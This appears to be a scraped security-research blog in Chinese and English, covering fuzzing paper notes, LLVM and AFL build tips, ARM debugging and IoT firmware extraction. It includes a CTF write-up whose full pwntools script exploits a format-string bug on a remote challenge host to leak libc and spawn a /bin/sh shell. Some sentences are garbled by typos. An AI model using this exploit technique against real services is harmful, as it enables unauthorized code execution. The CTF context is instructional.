P4. The DGF should adopt an adaptive mutation strategy when the seeds cover the different program states. The desired design is that when a seed has already reached the target sites(including target lines, basic blocks or functions), it should be given less chances for coarse-grained mutations(e.g., chunk replacement).

AFLGo’s Solution

针对P1，AFLGo只是选择路径最短的那条，然而路径最短的那条可能无法触发某个漏洞。
For P2. AFLGo only considers the explicit call graph information. As a result, function pointers are treated as the external nodes which are ignored during distance calculation. Besides, AFLGo counts the same callee in tis callers only once, and it does not differentiate multiple call patterns between the caller and callee.
For P3. AFLGo applies a simulated annealing based power scheduler: it favors those seeds closer to the targets by assigning more energy to them to be mutated; the applied cooling sechedule initially assigns smaller weight on the effecte of “distance guidance”, until it reaches the “exploitation” phrase. The issue is that there is no prioritization procedure so the newly generated seeds with smaller distance may wait for a long to be mutated.
For P4. The mutation operators of AFLGo come from AFL’s two non-deterministic strategies: 1) havoc, which does purely randomly mutations such as bit flips, bytewise replace, etc; 2) splice, which generates seeds from some random byte parts of two existing seeds. Notably, during runtime AFLGo excludes all the deterministic mutation procedures and relies purely on the power scheduling on havoc/splice strategies.

Suggestions to improve DGFs:

For P1, a more accurate distance definition is needed to retain trace diversity, avoiding the focus on short traces.
For P2, both direct and indirect calls need to be analyzed; various call patterns need to be distinguished during static distance calculation.
For P3, a moderation to the current power scheduling is required. The distance-guided seed prioritization is also needed.
For P4, the DGF needs an adaptive mutation strategy, which optimally applies the fine-grained abd ciarse-graubed nytatuibs wgeb tge dustabce between the seed to the targets is different.

Hawkeye’s Design

During fuzzing, the fuzzer selects a seed from a priority seed queue. The fuzzer applies a power scheduling against the seed with the goal of giving those seeds that are considered to be “closer” to the target sites more mutation chances, i.e, energy. Specifically, this is achieved through a power function, which is a combination of the covered function similarity and the basic block trace distance. For each newly generated test seed during mutation, after capturing its execution trace, the fuzzer will calculate the covered function similarity and the basic block trace distance based on the utilities. For each input execution trace, its basic block trace distance is calculated as the accumulated basic block level distances divided by the total number of executed basic blocks; and its covered function similarity is calculated based on the overlapping of current executed functions and the target function trace closure, as well as the function level distance.

After the energy is determined, the fuzzer adaptively allocates mutation budgets on two different categories of mutations according to mutators’ granularities on the seed(coarse-grained mutations and fine-grained mutations). Afterwards, the fuzzer evaluates the newly generated seeds to prioritize those that have more energy or that have reached the target functions.

Fuzzing Machine Learning Model

TensorFuzz: Debugging Neural Networks with Coverage-Guided Fuzzing(18)

Coverage-Guided Fuzzing for Deep Neural Networks(18)

paper

Kernel Fuzzing

RAZZER: Finding Kernel Race Bugs through Fuzzing(oakland 19)

kAFL: Hardware-Assisted Feedback Fuzzing for OS Kernels(Usenix Security 17)

Fuzzing File Systems via Two-Dimensional Input Space Exploration(oakland 19)

paper

PeriScope: An Effective Probing and Fuzzing Framework for the Hardware-OS Boundary(NDSS 19)

Anti-Fuzzing

FUZZIFICATION: Anti-Fuzzing Techniques(Usenix 19)

ANTIFUZZ: Impeding Fuzzing Audits of Binary Executables(Usenix 19)

paper
data

IoT Fuzzing

IOTFUZZER: Discovering Memory Corruptions in IoT Through App-based Fuzzing(NDSS 18)

paper

FIRM-AFL: High-Throughput Greybox Fuzzing of IoT Firmware via Augmented Process Emulation(Usenix Security 19)

paper
code

Evaluate Fuzzing

Evaluating Fuzz Testing(CCS 18)

paper

They found that:

Most papers failed perform multiple runs, and those that did failed to account for varying performance by using a statistical test.
Many papers measured fuzzer performance not by counting distinct bugs, but instead by counting “unique crashes” using heuristics such as
AFL’s coverage measure and stack hashes.
Many papers used short timeouts, without justification.
Many papers did not carefully consider the impact of seed choices on algorithmic improvements.
Papers varied widely on their choice of target programs.

os tutorial

2018-09-28T01:17:19.000Z

之前一直想了解OS的流程，直到在逛github的时候看到os-tutorial，这是一个比较适合小白了解OS，并手动构建一个OS的项目，先在此mark一下，此项目还在持续更新中~

llvm gold build

2018-09-27T23:30:17.000Z

Binutils Building

Download binutils source code

1	git clone --depth 1 git://sourceware.org/git/binutils-gdb.git binutils

Build binutils

mkdir build
cd build
../binutils/configure --enable-gold --enable-plugins --disable-werror
sudo make install

LLVMgold.so build

Download LLVM source code

1	https://github.com/llvm-mirror/llvm.git

Build LLVM with gold-plugin

mkdir build
cd build
cmake ../llvm -DLLVM_BINUTILS_INCDIR="path/to/binutils/include"
make -j($nproc)

And the LLVMgold.so will appear in the lib folder.

Copy

sudo cp lib/LLVMgold.so /usr/local/lib
sudo mkdir /usr/lib/bfd-plugins
sudo cp lib/LLVMgold.so /usr/lib/bfd-plugins
sudo cp lib/libLTO.so /usr/lib/bfd-plugins

LLVM添加sanitizer

2018-08-28T20:24:13.000Z

有的时候需要在编译器LLVM上添加自己写的sanitizer，比如自己写的sanitizer名字叫做Bitype，想通过指定-fsanitize=bitype来开启Bitype sanitizer，则需要如下步骤:

在clang/Basic/Sanitizers.def文件中添加SANITIZER(“bitype”, Bitype)
在clang/Driver/SanitizerArgs.h中添加needsBitypeRt函数
在clang/lib/Deriver/ToolChain.cpp文件中getSupportedSanitizers()函数添加Res对Bitype的支持

afl fork server

2018-08-07T00:25:14.000Z

前言

fuzz解析数据的库函数的方法一般是找一个简单的二进制来测试库函数的功能，通过生成不同的输入来不断地运行该二进制程序。一般是通过fork和execve来生成子进程运行目标二进制程序，fuzz程序通过waitpid()函数来等待子进程退出，如果子进程发出SIGSEGV或SIGABORT等信号，则证明子进程崩溃了，此时可能会发生了memory corruption bugs。然而没有一个输入，就调用ececve()函数来进行程序的链接，库函数的初始化等操作，大大地降低了fuzzing的效率[1]。AFL通过在目标程序中插入fork server的逻辑代码来保证在fuzzing的时候只进行一次程序的链接，库函数的初始化等操作，而通过fork()函数的copy-on-write机制，大大提高了fuzzing的效率。

fork server

通过在二进制程序中插入fork server代码，该fork server会在main函数之前执行，它会暂停，等待AFL fuzzing端的输入，当AFL fuzzing端”发号施令”给fork server之后，fork server此时就通过fork()函数来生成子进程，子进程继续main函数的逻辑，由于fork server已经将各种资源都加载好，所以每次子进程只需要执行main函数的代码即可。

上面的例子是在afl中的llvm_mode文件夹中的afl-llvm-rt.o.c文件中定义的，fork server的逻辑也是比较简单，一个while循环，从FORKSRV_FD文件中读取AFL端给传来的数据，其中FORKSRV_FD是一个管道的一端，负责从AFL端读取数据。如果AFL端传来数据，则证明此时AFL的输入已准备好，则可以通过fork()来生成一个子进程，来运行main函数，进行fuzzing。

由于AFL进程与要fuzzing的进程不是父子关系(AFL与fork server是父子关系，fork server与要fuzzing的进程是父子关系)。所以AFL通过管道与fork server进程进行通信，而fork server通过waitpid()函数等待要fuzzing的子进程完成，得到其退出是的状态status，并将status通过管道传给AFL进程。

其中在afl-fuzz.c中的init_forkserver函数中，是对管道进行的初始化，感兴趣的可以看一下。

引用

Fuzzing random programs without execve(). https://lcamtuf.blogspot.com/2014/10/fuzzing-binaries-without-execve.html

AFL Fuzzing with ASAN

2018-07-31T15:05:45.000Z

前言

AFL是使用比较广泛的fuzzing工具，ASAN(AddressSanitizer)是google的一个非常高效的内存错误检测工具，其能够检查出UAF,Heap/Stack buffer overflow, Use after return, Use after scope, Initialization order bugs and Memory leaks。这两者都有基于llvm的版本，所以将这两者相结合效果也是非常好的。

Problem

在用AFL和ASAN来fuzzing heartbleed(教程链接afl-training)的时候出现了一个问题:

1
2
3

Since it seems to be built with ASAN and you have a
    restrictive memory limit configured, this is expected; please read
    /usr/local/share/doc/afl/notes_for_asan.txt for help

这是因为ASAN工具是跟踪所有内存的，所以理论上可能需要的内存比较大，在32位系统中，最多占用800多MB内存。在64位系统中，ASAN的shadow memory的理论上占用的最大内存是17.5TB和20TB，而一般的电脑并没有这么大的内存，所以可能会使电脑死机。所以AFL会在64位机器运行64位程序的时候，报出这种错误。链接也提供了这种情况的解决方法。

实际上，以上最大内存只是理论上的，一般运行的程序shadow memory所占用的内存并没有这么多，所以第一种解决方法就是使用-m none选项，来忽略此错误:

1	afl-fuzz -i in -o out -m none ./executable

第二种方法就是使用cgroup来限定改程序使用的资源：

1	sudo ~/afl/experimental/asan_cgroups/limit_memory.sh -u usename afl-fuzz -i in -o out -m none ./executable

第二种方法是比较稳妥的方法，并不会对系统造成非常大的影响，因为其限定了程序所使用的内存资源。

引用

记一次Format String的利用(格式化字符串不在栈上)

2018-07-29T18:50:37.000Z

前言

这两天做了一个CTF的题目，该题目的二进制链接。该题目的逻辑非常简单，就是接受输入，并将其打印，在打印的时候利用了printf函数，很明显是个format string漏洞。但由于格式化的字符串并没有在栈中，所以利用起来有一点困难，在此记录一下自己利用的方法。

格式化字符串漏洞

格式化字符串函数可以接受可变数量的参数，并将第一个参数作为格式化字符串，根据其来解析之后的参数参考。

一般发生格式化字符串漏洞的原因是因为并没有指定第一个参数格式化字符串(或者格式化字符串可以更改)，所以给了攻击者一个可以控制格式化字符串的机会，进而可以实现任意的内存读写能力。其中能触发格式化字符串漏洞的函数有如下几个: scanf, printf, vprintf, vfprintf, sprintf, vsprintf, vsnprintf, setproctitle, syslog等，如果想比较系统的了解格式化字符串漏洞，可以访问链接。

程序分析

首先拿到程序，先分析一下该程序的保护措施:

发现其除了canary保护之外，其它防护都开了(主要是输入的buff并不在栈上，所以并没有canary保护，并不代表着可以通过buffer overflow来溢出返回地址-_-)。

然后扔给IDA pro分析其逻辑:

该程序的逻辑非常简单，首先是给你三次机会，让你进行格式化字符串攻击，COUNT是全局变量，COUNT=3。接下来是exploit_me函数，该函数的逻辑更加简单，现将BUFF变量清空，然后读入13个字节，再将输入的字符串输出，在输出的时候会发生格式化字符串的攻击。其中BUFF是一个全局变量，大小是16个字节。该程序攻击起来主要有如下几个难点:

由于输入的长度有限(只有13个字节)，并且只允许进行三次尝试
格式化字符串不在栈上，进行任意内存的读写存在一定的难度

漏洞利用

接下来主要针对以上提出来的两个难点进行攻击。

修改计数变量

由于只允许三次输入，并且输入的长度有限，很难进行有效的攻击，所以接下来思路就是首先利用这三次输入将控制输入的计数变量修改掉，使其能够进行多次输入。

有上面程序分析可以看到，计数变量有两个：MACRO_COUNT局部变量和COUNT全局变量，只要将其中一个值修改掉，就可以进行多次输入，方便进行接下来的攻击。所以现在思路主要如下：

泄露地址：包括栈的地址和程序的地址。
修改栈的内容：保证栈中有MACRO_COUNT或者COUNT的地址。
修改MACRO_COUNT或者COUNT的值。

以上的每一个目的都可以利用一次format string攻击实现。

泄露地址

上面该图是在printf调用前的栈的内容，可以看出第一个参数是格式化字符串的地址，而接下来的一个内存单元0xffffcf6c存储的也是格式化字符串的地址，所以可以通过泄露该内存单元的内容来泄露BUFF变量的地址，从而可以算出程序的基址。接下来，ebp的内存单元存储的是saved ebp，上一个函数的ebp值，该值是栈的地址，所以可以通过泄露该地址来泄露栈的地址。所以可以输入

%p%6$p

来泄露栈的地址和程序的地址。

修改栈的内容

由于格式化字符串不在栈上，所以想通过格式化字符串来修改某个内存单元的值，首先得先把该内存的地址写入栈中。通过上面分析我们知道了栈上的地址和程序的地址，通过偏移也能计算出MACRO_COUNT和COUNT的地址。接下来则需要将MACRO_COUNT或者COUNT的地址写入栈中。在此，我选择将MACRO_COUNT的地址写入到栈中，理由如下:

从上图可以看到0xffffcf84地址处存储的是内存单元0xffffd044的地址，而0xffffd044存储的值是0xffffd224，也是栈上的一个地址，而MACRO_COUNT也是栈上的变量，其地址与0xffffd224的高16位应该是相等的，所以此时只需要修改0xffffd044地址存储的低16位即可。这样能保证攻击顺利进行（如果修改整个32位的话，则输出的数太多，需要花费很长时间，还有一个原因是导致输入的字符串过长，没办法实现攻击）。

所以具体的攻击手段就是将0xffffd044内存单元存储的值的低16位改为MACRO_COUNT的高位byte地址即可。

假设MACRO_COUNT的地址为addr。
则可以输入

1	"%" + str(addr & 0xffff) + "d" + "%9$hn"

即可。

修改MACRO_COUNT的值

通过前面的步骤，实现了将0xffffd224的地址处存储了MACRO_COUNT的地址，而0xffffd044相对于0xffffcf60(printf的第一个参数)的offset为0xE4,则可以进行如下输入使的MACRO_COUNT的高位为0xFF。

1	"%255d%57$hhn"

其中57为0xE4/4，因为地址是4字节的。

读写任意内存

通过以上的努力，我们可以进行多次的输入。由于输入的格式化字符串是全局变量，并不在栈上，我们就不能通过一次简单的输入就能读写任意内存，此时需要通过格式化字符串来间接的修改内存地址到栈上。具体思路如下：

如果我想要将地址addr写入到栈上的某个内存单元上去，设栈上的该内存单元地址为stack_addr。则我需要一次中介来完成此类攻击。

我们再来看一下调用printf时栈中的布局：

可以看到0xffffcf84和0xffffcf88两个内存单元存储的内容是栈上的地址，而其又指向了一个栈上的地址。所以可以通过格式化字符串将0xffffd044地址处的内容改为stack_addr+2，将0xffffd04c地址处的内容改为stack_addr，然后再通过$hn分别向stack_addr+2处写入addr的高16位((addr&0xffff0000)>>16)，stack_addr处写入addr的低16位(addr&0xffff)。

具体的攻击过程如下:

def modify(address, modifiedAddress):
    print("modified address is %x" % modifiedAddress)
    #puts_got_run = puts_got + binary_base
    modifiedAddress_high = (modifiedAddress & 0xffff0000) >> 16
    #log.info("strcmp got run high %x " % strncmp_got_run_high)
    modifiedAddress_low = modifiedAddress & 0xffff

    temp_low = (address + 0x2) & 0xffff
    print("temp low is %x" % temp_low)
    payload3 = "%"+str(temp_low) + "d" + "%9$hn"
    p.sendline(payload3)
    p.recvrepeat(0.5)

    temp_high = (address) & 0xffff
    print("temp high is %x" % temp_high)
    payload4 = "%" + str(temp_high) + "d" + "%10$hn"
    p.sendline(payload4)
    p.recvrepeat(0.5)

    payload5 = "%" + str(modifiedAddress_high)+"d" + "%57$hn"
    print("got run high is %x " % (modifiedAddress_high))
    p.sendline(payload5)
    # p.recv()
    # sleep(1)
    p.recvrepeat(0.5)

    payload6 = "%" + str(modifiedAddress_low)+"d"+"%59$hn"
    print("got run low is %x " % (modifiedAddress_low))
    p.sendline(payload6)
    p.recvrepeat(0.5)

其中address就是此处的stack_addr，modifiedAddress就是此处的addr。

有了可以向栈中写入任意地址的能力，我们就可以进行libc地址的泄露和修改返回地址及其参数了。

泄露libc地址

通过以上的方法，我们可以将printf函数的got地址写入到栈上，然后通过%s读取got的内容，从而泄露libc的地址。
由于改题目并没有提供具体的libc版本，所以可以通过泄露的printf的地址，到libc database search网站进行查询。通过绣楼libc地址，我们可以得到system的地址和”/bin/sh”字符串的地址。

修改返回地址和参数

由于泄露了libc的地址，所以将main函数的返回地址修改为system的地址，并将其参数设为”/bin/sh”字符串的地址，输入EXIT，即可完成攻击。

整个的攻击脚本如下:


from pwn import *


def modify(address, modifiedAddress):
    print("modified address is %x" % modifiedAddress)
    #puts_got_run = puts_got + binary_base
    modifiedAddress_high = (modifiedAddress & 0xffff0000) >> 16
    #log.info("strcmp got run high %x " % strncmp_got_run_high)
    modifiedAddress_low = modifiedAddress & 0xffff

    temp_low = (address + 0x2) & 0xffff
    print("temp low is %x" % temp_low)
    payload3 = "%"+str(temp_low) + "d" + "%9$hn"
    p.sendline(payload3)
    p.recvrepeat(0.5)

    temp_high = (address) & 0xffff
    print("temp high is %x" % temp_high)
    payload4 = "%" + str(temp_high) + "d" + "%10$hn"
    p.sendline(payload4)
    p.recvrepeat(0.5)

    payload5 = "%" + str(modifiedAddress_high)+"d" + "%57$hn"
    print("got run high is %x " % (modifiedAddress_high))
    p.sendline(payload5)
    # p.recv()
    # sleep(1)
    p.recvrepeat(0.5)

    payload6 = "%" + str(modifiedAddress_low)+"d"+"%59$hn"
    print("got run low is %x " % (modifiedAddress_low))
    p.sendline(payload6)
    p.recvrepeat(0.5)




#p = process('./babyformat')
pp = ELF('./babyformat')
p = remote('104.196.99.62', port = 2222)
p.recvuntil('==== Baby Format - Echo system ====')

puts_got = pp.got['puts']
# puts_offset = 0x5fca0
# bin_sh_offset = 0x15ba0b
# system_offset = 0x3ada0
system_offset = 0x3cd10
puts_offset = 0x67360
bin_sh_offset = 0x17b8cf

## leak address
p.sendline('%p%6$p')
#sleep(3)
p.recvline()
leaked = p.recvline()
addr_buff = int(leaked[2:10], 16)
binary_base = addr_buff - 0x202c 
log.info("BUFF address is %x" % addr_buff)
addr_stack_ebp = int(leaked[12:20], 16) - 0x20
log.info("ebp address is %x" % addr_stack_ebp)

#ebp_low_four = addr_stack_ebp & 0xffff

# variable MACRO_COUNT address's low four bytes
count_low_four = (addr_stack_ebp + 0x17) & 0xffff

payload1 = "%" + str(count_low_four) + "d" + "%9$hn"
p.sendline(payload1)
p.recvrepeat(1)

payload2 = "%255d%57$hhn"
p.sendline(payload2)
p.recvrepeat(1)

####### No problem up ##############################

puts_got_run = puts_got + binary_base
modify(addr_stack_ebp + 0x20, puts_got_run)

p.recvrepeat(1)
#leak the strncmp address
payload7 = "%14$s"
p.sendline(payload7)
# print(p.recv())
#sleep(1)
puts_address = u32(p.recvline()[0:4])
log.info("puts address is %x " % puts_address)
libc_base = puts_address - puts_offset
log.info("libc base address is %x" % libc_base)

#############leak libc address done ############

ret_address = addr_stack_ebp + 0x34
arg_address = addr_stack_ebp + 0x3c

system_address = system_offset + libc_base
bin_sh_address = bin_sh_offset + libc_base

modify(ret_address, system_address)
modify(arg_address, bin_sh_address)
#raw_input()
p.recvrepeat(1)
#p.sendline('EXIT')

p.interactive()

References

ctf-wiki:格式化字符串漏洞原理介绍: https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_intro/
lib database search: https://libc.blukat.me/

Intel linux调试arm程序

2018-07-26T18:43:55.000Z

安装qemu

sudo apt-get install qemu

安装arm文件所需要的动态库

sudo apt-get install gcc-multilib-arm-linux-gnueabi
sudo apt-get install gcc-armhf-cross
此时在/usr/arm-linux-gnueabihf/lib/文件夹中会有安装的这些库，有的arm文件在动态链接的时候是直接指向的/lib/ld-linux-armhf.so.3文件的，所以此时需要将/usr/arm-linux-gnueabihf/lib/ld-linux-armhf.so.3软连接到/lib/文件夹下: ln -s /usr/arm-linux-gnueabihf/lib/ld-linux-armhf.so.3 /lib/ld-linux-armhf.so.3

运行

在运行前添加/usr/arm-linux-gnueabihf/lib文件夹到LD_LIBRARY_PATH环境变量里面: export LD_LIBRARY_PATH=/usr/arm-linux-gnueabihf/lib/:$LD_LIBRARY_PATH
qemu-arm运行arm程序: qemu-arm -g 1234 /path/of/arm-executable, 即在1234端口上开启调试模式

调试

此时就可以在自己机器上进行调试改程序，既可以使用IDA pro进行远端调试，也可以使用gdb进行调试，此处介绍gdb调试
在调试前请确保自己安装了gdb-multiarch，如果没有安装，则 sudo apt install gdb-multiarch
用gdb打开待调试文件: gdb-multiarch /path/of/arm-executable
在gdb中连接调试端口: target remote 1234，调试即可

Enjoy it!!!

IoT firmware逆向之入门篇

2018-07-11T00:52:27.000Z

前言

随着IoT(Internet of Things)设备快速增长，IoT设备的安全也逐渐引起大家的注意。如论文[1]所述，IoT的安全问题主要包括如下方面:

感知层安全。IoT的感知层主要包括wireless sensor networks, RFID, 802.11, BLE(Bluetooth low energy), zigbee and etc. 这些通信网络本身可能会存在一些安全问题。
网络层安全。IoT的网络层安全主要包括通信协议的安全，隐私泄露等问题。
应用层安全。应用层安全主要包括软件安全，认证问题，隐私数据的保护，认证和校验的问题。

它们的关系如下图所示：

图1 IoT安全概览

由于IoT设备对于能耗和及时性的要求比较高，所以其具体实现(操作系统及软件的保护机制)都和PC端和手机端有很大的区别。由于能耗的要求，大部分IoT设备都采用低能耗的处理器(比如arm Contex-M系列)，这些处理器大部分都没有MMU，所以没有虚拟地址到物理地址的转换，更无法提供ASLR等防护(arm Contex-M由于有MPU功能，能提供比较局限的内存防护机制)；由于实时性的要求，大部分采用的系统是RTOS(Real Time Operating System)或者直接是bare mental system，其每个设备的内存布局可能都是固定的。所以IoT设备的应用层的安全也是非常严峻的。

Firmware

在IoT设备中，其代码和数据一般存储在ROM中(大部分都是Flash，关于Flash的种类可以访问here来了解一下)。一般将这部分代码和数据称为Firmware(可能表述不准确，欢迎指正)。Firmware没有一个固定的格式，它更像是一个binary blob，具体的格式和解析根据设备的不同而有所不同。

一般获取firmware的方式主要有三种:

从厂商官网下载或者逆向厂商的App获得
劫持(中间人攻击)firmware更新过程
硬件逆向，直接读取存放firmware的flash或者UART串口调试

由于现在有很多IoT设备都是Over-The-Air Firmware Update，所以有很多厂商并不会在官网上提供firmware的下载，所以一般比较通用的获取firmware的方法都是通过硬件逆向方法。关于硬件逆向，推荐两篇文章物联网硬件安全分析基础-固件提取和物联网硬件安全分析基础-串口调试。

逆向Firmware

最近在查看关于firmware逆向有关的资料，发现有如下几个问题:

不知道哪些是代码段和数据段
不知道内存布局，即不知道firmware的基址
……

在浏览了很多教程之后，发现了关于Marvell IoT SDK的一些小经验，特总结下来，以备日后查阅。具体的教程可参阅Inside The Bulb: Adventures in Reverse Engineering Smart Bulb Firmware和dustcloud。dustcloud做了挺多关于小米iot逆向的工作的，其中小米的yeelight和智能网管设备的firmware都是采用的Marvell IoT SDK。由于dustcloud直接提供了yeelight的firmware，所以就省去了我硬件逆向提取firmware的步骤了，我直接从dustcloud下载firmware。

Inside The Bulb: Adventures in Reverse Engineering Smart Bulb Firmware介绍了如何将Marvell IoT SDK格式的firmware提取出代码，并将其合并成elf文件的，由于里面细节有限，我在此重复了里面的步骤，并总结出了一些方法。

首先在二进制编辑器中可以看到该firmware是MRVL(Marvell)的，而该文件含有一些entries, 表示了不同”段”的偏移，大小和地址信息:

DWORD magic;     // Always 0x2
DWORD offset;    // Offset into the file
DWORD size;      // Size of the section
DWORD address;   // Memory address where this section will be loaded
DWORD unknown;   // Probably some kind of checksum?

具体的firmware二进制数据如下图所示:

图2 firmware二进制

可知其含有三个不同的entry，可使用dd工具将这三个不同的”段”提取出来:

1
2
3

dd if=yeelink.light.strip1.bin bs=1 skip=200 count=12824 of=s1.bin
dd if=yeelink.light.strip1.bin bs=1 skip=13024 count=299984 of=s2.bin
dd if=yeelink.light.strip1.bin bs=1 skip=313008 count=5420 of=s3.bin

此时，得到了三个二进制文件，使用arm-none-eabi-objcopy将其合并成ELF文件:

arm-none-eabi-objcopy -I binary -O elf32-littlearm --adjust-vma 0x100000 --binary-architecture arm --rename-section .data=.text,contents,alloc,load,readonly,code --add-section .text2=s2.bin --set-section-flags .text2=contents,alloc,load,readonly,code --change-section-address .text2=0x1f0032e0 --add-section .text3=s3.bin --set-section-flags .text3=contents,alloc,load,readonly,code --change-section-address .text3=0x20000040 s1.bin firmware_yeelink.elf

上面的命令就是将三个文件合并成一个ELF文件，并且分别将其置为不同的section，设置virtual address。

如果直接将生成的文件firmware_yeelink.elf扔到IDA pro中会出现一个问题：由于objcopy生成的elf文件是可重定位类型(relocatable file)，扔到IDA中虚拟地址是从0开始的，并不是从0x100000开始的。

我最后终于找到一个方法：再使用ld链接器将可重定位类型的文件生成可执行类型(executable file)，并给每一个section添加虚拟地址:

1	arm-none-eabi-ld --section-start=.text=0x100000 --section-start=.text2=0x1f0032e0 --section-start=.text3=0x20000040 firmware_yeelink.elf -o firmware.elf

此时扔给IDA，虚拟地址正确.

（–未完待更–）

引用

[1] Mendez, Diego M., Ioannis Papapanagiotou, and Baijian Yang. “Internet of things: Survey on security and privacy.” arXiv preprint arXiv:1707.01879 (2017).

PCB Blog

paths in linux

PATH

Include Path

Linker Search Path

LD_LIBRARY_PATH

Reference

Ghidra Python Uses Other Packages

Binaryninja Python Path Install

Be Careful When Modifing Binary Program(Abount Stack Alignment)

Reference

C Programs Before main Function

What does the program do before main() function

crt0.o, ctri.o, ctrbegin.o, ctrn.o

Reference

git subtree

Add a remote repo

Merge the repo into the local git project

Create a new directory named pro-name and copy the git history of remote repo project into it.

Commit the changes to keep them safe

Synchronizing with remote repo

Reference

Compile Kernel using llvm/clang

Reference

Tutorial

Problems

unable reference to bcmp

compiler lacks asm-goto support

booting problem when compiling kernel with clang kasan.

some configuration may cause clang build error

clang error: unkown argument: ‘–mpreferred-stack-boundary=4’

clang does not support vlais

Undefined reference in amdgpu.ko

shellcode exit normally

前言

漏洞程序

原因

解决方案

分析CVE-2017-8890

环境

Debug

编译Linux内核

Add to your QEMU command:

gdb连接

PoC

用gdb调试qemu内核

编译linux内核

gdb调试

kgdb, kdb调试

git本地冲突

fuzzing related work

Interesting Fuzzing

Coverage-based Greybox Fuzzing as Markov Chain(CCS 16)

T-Fuzz: fuzzing by program transformation(oakland 18)

T-Fuzz Design

CollAFL: Path Sensitive Fuzzing(oakland 18)

AFL Coverage Measurements

CollAFL’s Solution to Hash Collision

Driller: Argumenting Fuzzing Through Selective Symbolic Execution(ndss 16)

VUzzer: Application-aware Evolutionary Fuzzing(ndss 17)

Data-flow features

Control-flow features

Angora: Efficient Fuzzing by Principled Search(oakland 18)

Designing New Operating Primitives to Improve Fuzzing Performance(CCS 17)

AFL Overview

QSYM: A Practical Concolic Execution Engine Tailored for Hybrid Fuzzing(Usenix 18)

Motivation: Performance Bottlenecks

Slow Symbolic Emulation

Ineffective Snapshot

Slow and Inflexible Sound Analysis

FAIRFUZZ: A Targeted Mutation Strategy for Increasing Greybox Fuzz Testing Coverage(ASE 18)

Full-speed Fuzzing: Reducing Fuzzing Overhead through Coverage-guided Tracing(oakland 19)

ProFuzzer: On-the-fly Input Type Probing for Better Zero-day Vulnerability Discovery(oakland 19)

NEUZZ: Efficient Fuzzing with Neural Program Smoothing(oakland 19)

REDQUEEN: Fuzzing with Input-to-State Correspondence(NDSS 19)

NAUTILUS: Fishing for Deep Bugs with Grammars(NDSS 19)

Send Hardest Problems My Way: Probabilistic Path Prioritization for Hybrid Fuzzing(NDSS 19)

EnFuzz: Ensemble Fuzzing with Seed Synchronization among Diverse Fuzzers(Usenix Security 19)

MOPT: Optimize Mutation Scheduling for Fuzzers(Usenix Security 19)

GRIMOIRE: Synthesizing Structure while Fuzzing(Usenix Security 19)

unable reference to `bcmp`